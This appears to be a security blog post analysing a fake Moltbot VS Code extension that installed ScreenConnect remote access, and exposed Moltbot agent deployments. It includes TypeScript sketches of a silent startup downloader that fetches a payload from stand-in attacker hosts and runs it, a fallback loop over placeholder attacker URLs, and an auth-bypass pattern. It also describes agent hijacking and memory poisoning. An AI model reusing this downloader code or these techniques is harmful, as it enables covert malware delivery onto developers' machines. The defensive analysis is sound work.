When the AI Assistant Opens the Door: Fake Moltbot Extension Turns Developers into an Entry Point
- Javier Conejo del Cerro
- 2 days ago
- 3 min read

The rapid adoption of AI coding assistants has reshaped developer workflows, but it has also created a new and attractive attack surface. In January 2026, security researchers uncovered a malicious Visual Studio Code extension impersonating Moltbot (formerly Clawdbot), an open-source AI agent framework with tens of thousands of GitHub stars. By abusing brand trust, insecure-by-default deployments, and the elevated privileges of developer environments, attackers combined marketplace abuse, remote access tooling, and AI agent misconfigurations to establish persistent access and enable large-scale data exposure and agent hijacking.
Phase 1 – Trust as the Entry Vector
The attack began with a malicious extension published on the official VS Code Marketplace under the name “ClawdBot Agent – AI Coding Assistant.” The extension falsely claimed to provide AI coding capabilities for Moltbot, capitalizing on the tool’s popularity despite Moltbot having no legitimate VS Code extension.
Developers searching for Moltbot-related tooling were tricked into installing the extension from a trusted marketplace, lowering suspicion and bypassing organizational controls that often assume marketplace content to be vetted and safe. Once installed, the extension was automatically executed every time VS Code launched, giving the attackers reliable code execution on developer machines.
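The startup-execution step relies on standard extension plumbing rather than any exploit. The sketch below (TypeScript, with invented identifiers; the extension's actual source has not been published in full) shows how an extension that declares a broad activation event gets its activate() function run on every editor launch, which is all the foothold the downloader stage needs.

```typescript
// package.json (excerpt): declaring "activationEvents": ["onStartupFinished"]
// (or the catch-all "*") makes VS Code call activate() on every launch,
// with no user interaction required.
import * as vscode from 'vscode';

export function activate(context: vscode.ExtensionContext) {
  // A plausible-looking command keeps up the "AI coding assistant" facade...
  context.subscriptions.push(
    vscode.commands.registerCommand('clawdbotAgent.assist', () => {
      vscode.window.showInformationMessage('AI assistant ready');
    })
  );

  // ...while the real work happens silently at activation time. In the
  // reported campaign, this stage fetched a remote config and staged a
  // ScreenConnect client (sketched under Phase 2 below).
  stagePayload().catch(() => { /* fail quietly to avoid drawing attention */ });
}

async function stagePayload(): Promise<void> {
  // Placeholder for the downloader described in Phase 2.
}

export function deactivate() {}
```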
Phase 2 – Payload Delivery and Persistence
Upon execution, the extension retrieved a remote config.json file from attacker-controlled infrastructure. This configuration directed the extension to download and execute Code.exe, which deployed a legitimate remote desktop application: ConnectWise ScreenConnect.
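The delivery flow described above amounts to a small, config-driven downloader. The following is a minimal hypothetical sketch of that pattern in TypeScript (Node.js runtime; the URL, config schema, and file paths are placeholders, not the campaign's real infrastructure or code):

```typescript
import { writeFile } from 'node:fs/promises';
import { execFile } from 'node:child_process';
import * as path from 'node:path';
import * as os from 'node:os';

// Placeholder endpoint; the real config.json lived on attacker-controlled
// infrastructure whose schema has not been published in full.
const CONFIG_URL = 'https://attacker.invalid/config.json';

async function stagePayload(): Promise<void> {
  // 1. Fetch the remote configuration that tells the extension what to drop.
  const config = (await (await fetch(CONFIG_URL)).json()) as { payloadUrl: string };

  // 2. Download the payload ("Code.exe" in this campaign, a preconfigured
  //    ConnectWise ScreenConnect client installer).
  const bytes = Buffer.from(await (await fetch(config.payloadUrl)).arrayBuffer());
  const target = path.join(os.tmpdir(), 'Code.exe');
  await writeFile(target, bytes);

  // 3. Execute it; the client then connects out to the attackers' relay,
  //    giving them interactive remote access.
  execFile(target, () => { /* ignore errors and stay silent */ });
}
```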
The attackers had set up their own ScreenConnect relay server and distributed a preconfigured client through the extension. As soon as the extension was installed, the ScreenConnect client connected back to attacker infrastructure, granting persistent, interactive remote access to the compromised host.
To ensure resilience, the extension included multiple fallback delivery mechanisms. If the primary infrastructure was unavailable, it could retrieve a malicious DLL (DWrite.dll, written in Rust) and sideload it to deliver the same payload via Dropbox or alternative domains. Additional hard-coded URLs and batch-script–based delivery paths ensured that the ScreenConnect payload could still be deployed even if individual methods failed. This redundancy highlights deliberate planning for operational reliability rather than opportunistic abuse.
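Redundancy of this kind typically needs nothing more elaborate than walking a list of hard-coded sources until one answers. A simplified sketch, with placeholder URLs standing in for the primary server, the Dropbox-hosted DLL, and the backup domains:

```typescript
// Placeholder stand-ins for the redundant delivery paths described above:
// the primary server, the Dropbox-hosted DWrite.dll, and backup domains.
const PAYLOAD_SOURCES = [
  'https://primary.attacker.invalid/Code.exe',
  'https://dropbox-mirror.invalid/DWrite.dll',
  'https://backup.attacker.invalid/payload.bin',
];

async function fetchWithFallback(): Promise<Uint8Array | null> {
  for (const url of PAYLOAD_SOURCES) {
    try {
      const res = await fetch(url);
      if (res.ok) {
        // First source that answers wins; the others exist purely for resilience.
        return new Uint8Array(await res.arrayBuffer());
      }
    } catch {
      // Takedown or network error on this source: fall through to the next one.
    }
  }
  return null; // every delivery path failed
}
```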
Phase 3 – AI Agent Exposure and Data Compromise
Beyond the malicious extension itself, parallel research revealed systemic security risks in Moltbot deployments. Hundreds of Moltbot instances were found exposed online due to reverse proxy misconfigurations that treated internet traffic as “local” and therefore trusted. Moltbot’s design auto-approved such connections without authentication.
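The proxy flaw is worth spelling out: when a reverse proxy terminates every connection, the agent only ever sees the proxy's own address, so a naive "local means trusted" check approves the entire internet. A minimal hypothetical sketch of that flawed decision (plain Node.js HTTP server, not Moltbot's actual code):

```typescript
import { createServer } from 'node:http';

createServer((req, res) => {
  // Behind a reverse proxy, req.socket.remoteAddress is the PROXY's address
  // (commonly 127.0.0.1), so this "local" check passes for every visitor
  // the proxy forwards, i.e. the entire internet.
  const remote = req.socket.remoteAddress ?? '';
  const looksLocal =
    remote === '127.0.0.1' || remote === '::1' || remote === '::ffff:127.0.0.1';

  if (looksLocal) {
    // Auto-approved, unauthenticated access to config, keys, and memories.
    res.end('trusted: full agent access granted');
  } else {
    res.statusCode = 401;
    res.end('authentication required');
  }
}).listen(3000);
```

A correct deployment either requires authentication regardless of the source address or explicitly validates a trusted forwarded-header chain from the proxy.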
As a result, attackers could access configuration data, API keys, OAuth credentials, chat histories, and long-term “memories” stored in plaintext. Because Moltbot agents can act autonomously across platforms like Slack, Telegram, Discord, WhatsApp, Signal, and Microsoft Teams, a compromised agent can impersonate its operator, inject messages into conversations, manipulate responses, and exfiltrate sensitive organizational data without immediate detection.
Researchers also warned of agent hijacking and memory poisoning, where attackers not only steal data but alter an agent’s stored context and behavior. This elevates the threat from traditional credential theft to long-term manipulation of AI-driven workflows. Major infostealer families such as RedLine, Lumma, and Vidar have already begun adapting to specifically target Moltbot directory structures to harvest this high-value data.
Measures to Defend Against the Attack
Organizations and developers should treat AI agents and developer environments as high-risk assets and implement layered controls, including:
- Removing the malicious VS Code extension and auditing all installed IDE plugins (see the audit sketch after this list)
- Reviewing Moltbot configurations and disabling unauthenticated or auto-approved connections
- Revoking all API keys, OAuth tokens, and service integrations linked to Moltbot instances
- Restricting or monitoring remote access tools such as ScreenConnect
- Hardening reverse proxy configurations and enforcing proper authentication boundaries
- Implementing network segmentation and outbound traffic monitoring for developer endpoints
- Sandboxing or strictly vetting third-party AI “skills” and plugins
- Monitoring for infostealer and RAT activity on developer machines
- Treating AI agents as privileged identities subject to least privilege and continuous monitoring
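For the first item on the list, installed extensions can be inventoried straight from disk (or with `code --list-extensions` on the command line). Below is a small sketch that flags anything outside an internal allow-list; the directory layout and extension IDs shown are illustrative assumptions, not a complete audit tool.

```typescript
import { readdir } from 'node:fs/promises';
import * as path from 'node:path';
import * as os from 'node:os';

// Default per-user extension directory on most platforms; portable installs
// and VS Code Insiders use different paths (illustrative assumption).
const EXT_DIR = path.join(os.homedir(), '.vscode', 'extensions');

// Example allow-list of approved "publisher.name" identifiers (hypothetical).
const ALLOWED = new Set(['ms-python.python', 'dbaeumer.vscode-eslint']);

async function auditExtensions(): Promise<void> {
  const entries = await readdir(EXT_DIR, { withFileTypes: true });
  for (const entry of entries) {
    if (!entry.isDirectory()) continue;
    // Folders are named "publisher.name-1.2.3"; strip the version suffix.
    const id = entry.name.replace(/-\d+(\.\d+)*$/, '').toLowerCase();
    if (!ALLOWED.has(id)) {
      console.warn(`Unapproved extension installed: ${entry.name}`);
    }
  }
}

auditExtensions().catch(console.error);
```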
The fake Moltbot VS Code extension campaign illustrates how AI tooling has become a prime target for attackers seeking deep, durable access into organizations. By blending trusted marketplaces, legitimate remote access software, and insecure AI agent architectures, attackers can bypass traditional controls and shift from simple data theft to agent-level compromise.
This incident underscores a broader trend: AI agents are not just applications, but autonomous actors with memory, reach, and authority. When misconfigured or compromised, they become powerful force multipliers for attackers. Securing AI-assisted development workflows therefore requires moving beyond plugin hygiene and into a mindset where AI agents are protected with the same rigor as human users and critical service accounts.
Source: The Hacker News



